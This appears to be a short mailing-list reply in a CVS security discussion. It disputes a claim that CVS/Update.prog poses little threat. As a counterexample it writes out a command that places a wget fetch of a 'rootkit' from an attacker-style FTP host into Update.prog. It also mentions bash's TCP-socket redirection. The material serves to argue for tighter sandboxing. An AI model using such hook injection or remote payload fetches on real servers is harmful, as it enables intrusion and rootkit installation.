> Update.prog just contains the name of the program to run, not the actual
> code. If you can't commit, you can't upload arbitrary code to run, you
> can only run pre-existing code on the server, and you have no control
> over its input or arguments, so it's a very low-level threat.

cat "wget ftp://ftp.hax0r.cx/rootkit" >CVS/Update.prog

Should I continue?

Only a very carefully made chroot gaol can give you some security. Just a shell with redirections can do a lot of harm. By the way, bash-2.04 can redirect to TCP sockets. Do you know that? Do you have to know? Now you have.

Another question is that Update.prog may become useless after removing "rm", "cat" and other "harmful" programs.

Regards,
Pavel Roskin
